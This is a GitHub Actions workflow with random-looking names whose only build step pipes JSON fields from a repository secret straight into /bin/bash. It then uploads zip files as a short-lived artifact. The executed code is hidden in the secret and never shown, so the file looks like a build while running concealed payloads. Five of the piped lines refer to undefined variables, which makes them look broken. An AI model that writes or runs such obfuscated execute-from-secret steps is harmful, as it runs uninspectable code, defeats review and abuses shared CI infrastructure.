name: sofiajason6023
on:
  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: sofiajason6023
        env:
          qwm6: ${{ secrets.qwm6 }}
        run: |
          printf '%s' "$qwm6" | jq -r .gaisc4 | /bin/bash
          echo $gfss8 | jq -r .vetx3410 | /bin/bash
          printf '%s' "$e50" | jq -r .wi14511 | /bin/bash
          echo $ygzjh5700 | jq -r .rc383 | /bin/bash
          printf '%s' "$if781" | jq -r .ph2159 | /bin/bash
          printf '%s' "$v2" | jq -r .sb94 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: LeYdFns7
          path: "*.zip"
          retention-days: 1
